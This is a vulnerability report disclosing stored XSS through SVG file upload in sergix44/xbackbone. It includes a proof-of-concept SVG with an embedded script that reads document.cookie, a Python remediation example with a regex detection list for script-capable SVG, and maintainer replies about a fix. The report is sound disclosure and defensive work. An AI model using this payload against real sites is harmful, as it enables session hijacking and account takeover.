Cross-site Scripting (XSS) - Stored in sergix44/xbackbone
Reported on
Jul 6th 2021
✍️ Description
Stored XSS through file upload via a .svg file
🕵️♂️ Proof of Concept
Upload a .svg file with the following content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>
Give the file any name ending in .svg (for example store-xss.svg) and upload it. After the upload, click "open".
Then click "raw".
Observe the stored XSS payload being executed.
💥 Impact
Possible to steal admin cookies or take over another account via cookie grabbing.
💥 Remediation
Force the file to be downloaded instead of opening.
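The remediation above, and the plain-text raw mode the maintainer proposes in the comments, amount to choosing response headers so that an SVG is never rendered as a document by the browser. The following is an added example (not XBackBone's own code) that computes those headers for a raw-mode response and also flags script-capable SVG at upload time for logging; the sample SVG inputs are constructed.

```python
import re

# Constructed sample inputs for this example (the first mirrors the report's PoC).
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<polygon points="0,0 0,50 50,0" fill="#009900"/>
<script type="text/javascript">alert(document.cookie);</script>
</svg>"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="10"/></svg>'

# Markers of script-capable content in SVG. Regex-based, so this is a triage
# signal for logging or alerting, not a sanitizer (use an XML parser for that).
ACTIVE_PATTERNS = [
    re.compile(rb"<\s*script\b", re.I),                      # <script> elements
    re.compile(rb"\son[a-z]+\s*=", re.I),                    # onload=, onclick=, ...
    re.compile(rb"(?:xlink:)?href\s*=\s*[\"']?\s*javascript:", re.I),
    re.compile(rb"<\s*foreignObject\b", re.I),               # embedded HTML
]

def svg_has_active_content(data: bytes) -> bool:
    """True if the SVG contains script-capable markup worth flagging at upload."""
    return any(p.search(data) for p in ACTIVE_PATTERNS)

def _safe_filename(name: str) -> str:
    # Replace characters that could break out of the Content-Disposition value.
    return re.sub(r'[\r\n";\\]', "_", name)

def raw_response_headers(content_type: str, filename: str) -> dict:
    """Headers for serving an uploaded file in "raw" mode.

    SVG is never rendered inline: it is returned as text/plain with an
    attachment disposition, so the browser shows or saves the source and
    never executes the embedded script. nosniff stops content sniffing from
    reinterpreting the body, and the sandbox CSP is defence in depth for any
    other type that is served inline.
    """
    headers = {
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",
    }
    fname = _safe_filename(filename)
    if content_type.split(";")[0].strip().lower() == "image/svg+xml":
        headers["Content-Type"] = "text/plain; charset=utf-8"
        headers["Content-Disposition"] = f'attachment; filename="{fname}"'
    else:
        headers["Content-Type"] = content_type
        headers["Content-Disposition"] = f'inline; filename="{fname}"'
    return headers
```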
💥 References
https://owasp.org/www-community/attacks/xss/
https://en.wikipedia.org/wiki/Cross-site_scripting
https://www.acunetix.com/websitesecurity/cross-site-scripting/
https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/
Occurrences
Hi! Thanks for your work. All the cookies used by XBB are set by the backend as http only. So no remember tokens or session token should be leaked with this attack. I'm going to make a patch, to return the svg as plain-text when using the raw mode. What do you think?
Hi, thanks for the response. Yeah, that would be a great solution. An XSS attack would not be possible.
@maintainer Hi, is it possible that you accept this as a bug (as well as the other report)? That way I am getting paid through the huntr.dev platform.
Yeah, great work guys...
For your interest, with XSS we can do many things other than steal cookies.
Just wanted to say some things to give more information.